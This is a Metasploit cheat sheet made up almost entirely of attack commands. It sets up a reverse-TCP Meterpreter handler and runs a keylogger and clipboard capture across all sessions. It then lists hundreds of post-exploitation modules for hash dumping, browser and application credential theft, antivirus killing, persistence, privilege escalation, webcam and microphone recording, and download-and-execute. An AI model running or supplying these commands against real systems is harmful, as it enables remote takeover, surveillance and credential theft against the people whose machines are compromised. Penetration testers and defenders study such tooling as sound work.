Some Metasploit tricks

Attacker and handler on different machines

Generate the payload / exploit the vulnerability (without starting a local handler)

...
set DisablePayloadHandler true
exploit -z

Start handler

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 1337
set ExitOnSession false
exploit -j

View sessions list

sessions

Drop into interactive session

sessions -i 1

Leave the session without closing it (it stays active in the background)

ctrl+z or background

Run a Meterpreter command on one session (-i N) or, without -i, on all sessions

sessions -C sysinfo

Run the keylogger (Meterpreter keyscan commands)

sessions -C keyscan_start

wait some time...

sessions -C keyscan_dump

Use extapi (capture clipboard for example)

load extapi
clipboard_get_data

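Post modules and legacy Meterpreter scripts (the short names without a post/ path are the older scripts, which were deprecated in favour of post modules and may be missing from current releases)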

run arp_scanner
run autoroute
run checkvm
run credcollect
run domain_list_gen
run dumplinks
run duplicate
run enum_chrome
run enum_firefox
run enum_logged_on_users
run enum_powershell_env
run enum_putty
run enum_shares
run enum_vmware
run event_manager
run file_collector
run get_application_list
run get_env
run get_filezilla_creds
run get_local_subnets
run get_pidgin_creds
run get_valid_community
run getcountermeasure
run getgui
run gettelnet
run getvncpw
run hashdump
run hostsedit
run keylogrecorder
run killav
run metsvc
run migrate
run multi_console_command
run multi_meter_inject
run multicommand
run multiscript
run netenum
run packetrecorder
run panda_2007_pavsrv51
run persistence
run pml_driver_config
run post/multi/gather/apple_ios_backup
run post/multi/gather/check_malware
run post/multi/gather/dbvis_enum
run post/multi/gather/dns_bruteforce
run post/multi/gather/dns_reverse_lookup
run post/multi/gather/dns_srv_lookup
run post/multi/gather/enum_vbox
run post/multi/gather/env
run post/multi/gather/filezilla_client_cred
run post/multi/gather/find_vmx
run post/multi/gather/firefox_creds
run post/multi/gather/jboss_gather
run post/multi/gather/lastpass_creds
run post/multi/gather/maven_creds
run post/multi/gather/multi_command
run post/multi/gather/pgpass_creds
run post/multi/gather/pidgin_cred
run post/multi/gather/ping_sweep
run post/multi/gather/resolve_hosts
run post/multi/gather/run_console_rc_file
run post/multi/gather/skype_enum
run post/multi/gather/thunderbird_creds
run post/multi/gather/tomcat_gather
run post/multi/gather/wlan_geolocate
run post/multi/general/close
run post/multi/general/execute
run post/multi/manage/dbvis_add_db_admin
run post/multi/manage/dbvis_query
run post/multi/manage/multi_post
run post/multi/manage/play_youtube
run post/multi/manage/record_mic
run post/multi/manage/set_wallpaper
run post/multi/manage/upload_exec
run post/multi/manage/zip
run post/multi/recon/local_exploit_suggester
run post/multi/recon/multiport_egress_traffic
run post/windows/capture/keylog_recorder
run post/windows/capture/lockout_keylogger
run post/windows/escalate/droplnk
run post/windows/escalate/getsystem
run post/windows/escalate/golden_ticket
run post/windows/escalate/ms10_073_kbdlayout
run post/windows/escalate/screen_unlock
run post/windows/gather/ad_to_sqlite
run post/windows/gather/arp_scanner
run post/windows/gather/bitcoin_jacker
run post/windows/gather/bitlocker_fvek
run post/windows/gather/cachedump
run post/windows/gather/checkvm
run post/windows/gather/credentials/avira_password
run post/windows/gather/credentials/bulletproof_ftp
run post/windows/gather/credentials/coreftp
run post/windows/gather/credentials/credential_collector
run post/windows/gather/credentials/domain_hashdump
run post/windows/gather/credentials/dynazip_log
run post/windows/gather/credentials/dyndns
run post/windows/gather/credentials/enum_cred_store
run post/windows/gather/credentials/enum_laps
run post/windows/gather/credentials/enum_picasa_pwds
run post/windows/gather/credentials/epo_sql
run post/windows/gather/credentials/filezilla_server
run post/windows/gather/credentials/flashfxp
run post/windows/gather/credentials/ftpnavigator
run post/windows/gather/credentials/ftpx
run post/windows/gather/credentials/gpp
run post/windows/gather/credentials/heidisql
run post/windows/gather/credentials/idm
run post/windows/gather/credentials/imail
run post/windows/gather/credentials/imvu
run post/windows/gather/credentials/mcafee_vse_hashdump
run post/windows/gather/credentials/mdaemon_cred_collector
run post/windows/gather/credentials/meebo
run post/windows/gather/credentials/mremote
run post/windows/gather/credentials/mssql_local_hashdump
run post/windows/gather/credentials/nimbuzz
run post/windows/gather/credentials/outlook
run post/windows/gather/credentials/razer_synapse
run post/windows/gather/credentials/razorsql
run post/windows/gather/credentials/rdc_manager_creds
run post/windows/gather/credentials/skype
run post/windows/gather/credentials/smartermail
run post/windows/gather/credentials/smartftp
run post/windows/gather/credentials/sso
run post/windows/gather/credentials/steam
run post/windows/gather/credentials/tortoisesvn
run post/windows/gather/credentials/total_commander
run post/windows/gather/credentials/trillian
run post/windows/gather/credentials/vnc
run post/windows/gather/credentials/windows_autologin
run post/windows/gather/credentials/winscp
run post/windows/gather/credentials/wsftp_client
run post/windows/gather/dnscache_dump
run post/windows/gather/dumplinks
run post/windows/gather/enum_ad_bitlocker
run post/windows/gather/enum_ad_computers
run post/windows/gather/enum_ad_groups
run post/windows/gather/enum_ad_managedby_groups
run post/windows/gather/enum_ad_service_principal_names
run post/windows/gather/enum_ad_to_wordlist
run post/windows/gather/enum_ad_user_comments
run post/windows/gather/enum_ad_users
run post/windows/gather/enum_applications
run post/windows/gather/enum_artifacts
run post/windows/gather/enum_av_excluded
run post/windows/gather/enum_chrome
run post/windows/gather/enum_computers
run post/windows/gather/enum_db
run post/windows/gather/enum_devices
run post/windows/gather/enum_dirperms
run post/windows/gather/enum_domain
run post/windows/gather/enum_domain_group_users
run post/windows/gather/enum_domain_tokens
run post/windows/gather/enum_domain_users
run post/windows/gather/enum_domains
run post/windows/gather/enum_emet
run post/windows/gather/enum_files
run post/windows/gather/enum_hostfile
run post/windows/gather/enum_ie
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_ms_product_keys
run post/windows/gather/enum_patches
run post/windows/gather/enum_powershell_env
run post/windows/gather/enum_proxy
run post/windows/gather/enum_putty_saved_sessions
run post/windows/gather/enum_services
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/enum_termserv
run post/windows/gather/enum_tokens
run post/windows/gather/enum_tomcat
run post/windows/gather/enum_trusted_locations
run post/windows/gather/enum_unattend
run post/windows/gather/file_from_raw_ntfs
run post/windows/gather/forensics/browser_history
run post/windows/gather/forensics/duqu_check
run post/windows/gather/forensics/enum_drives
run post/windows/gather/forensics/imager
run post/windows/gather/forensics/nbd_server
run post/windows/gather/forensics/recovery_files
run post/windows/gather/hashdump
run post/windows/gather/local_admin_search_enum
run post/windows/gather/lsa_secrets
run post/windows/gather/make_csv_orgchart
run post/windows/gather/memory_grep
run post/windows/gather/ntds_location
run post/windows/gather/outlook
run post/windows/gather/phish_windows_credentials
run post/windows/gather/resolve_sid
run post/windows/gather/reverse_lookup
run post/windows/gather/screen_spy
run post/windows/gather/smart_hashdump
run post/windows/gather/tcpnetstat
run post/windows/gather/usb_history
run post/windows/gather/win_privs
run post/windows/gather/wmic_command
run post/windows/gather/word_unc_injector
run post/windows/manage/add_user_domain
run post/windows/manage/archmigrate
run post/windows/manage/change_password
run post/windows/manage/clone_proxy_settings
run post/windows/manage/delete_user
run post/windows/manage/download_exec
run post/windows/manage/driver_loader
run post/windows/manage/enable_rdp
run post/windows/manage/enable_support_account
run post/windows/manage/exec_powershell
run post/windows/manage/forward_pageant
run post/windows/manage/hashcarve
run post/windows/manage/ie_proxypac
run post/windows/manage/inject_ca
run post/windows/manage/inject_host
run post/windows/manage/killav
run post/windows/manage/migrate
run post/windows/manage/mssql_local_auth_bypass
run post/windows/manage/multi_meterpreter_inject
run post/windows/manage/nbd_server
run post/windows/manage/payload_inject
run post/windows/manage/persistence_exe
run post/windows/manage/portproxy
run post/windows/manage/powershell/build_net_code
run post/windows/manage/powershell/exec_powershell
run post/windows/manage/pptp_tunnel
run post/windows/manage/priv_migrate
run post/windows/manage/pxeexploit
run post/windows/manage/reflective_dll_inject
run post/windows/manage/remove_ca
run post/windows/manage/remove_host
run post/windows/manage/rpcapd_start
run post/windows/manage/run_as
run post/windows/manage/run_as_psh
run post/windows/manage/sdel
run post/windows/manage/sticky_keys
run post/windows/manage/vmdk_mount
run post/windows/manage/vss_create
run post/windows/manage/vss_list
run post/windows/manage/vss_mount
run post/windows/manage/vss_set_storage
run post/windows/manage/vss_storage
run post/windows/manage/wdigest_caching
run post/windows/manage/webcam
run post/windows/recon/computer_browser_discovery
run post/windows/recon/outbound_ports
run post/windows/recon/resolve_ip
run post/windows/wlan/wlan_bss_list
run post/windows/wlan/wlan_current_connection
run post/windows/wlan/wlan_disconnect
run post/windows/wlan/wlan_profile
run powerdump
run prefetchtool
run process_memdump
run remotewinenum
run scheduleme
run schelevator
run schtasksabuse
run scraper
run screen_unlock
run screenspy
run search_dwld
run service_manager
run service_permissions_escalate
run sound_recorder
run srt_webdrive_priv
run uploadexec
run virtualbox_sysenter_dos
run virusscan_bypass
run vnc
run webcam
run win32-sshclient
run win32-sshserver
run winbf
run winenum
run wmic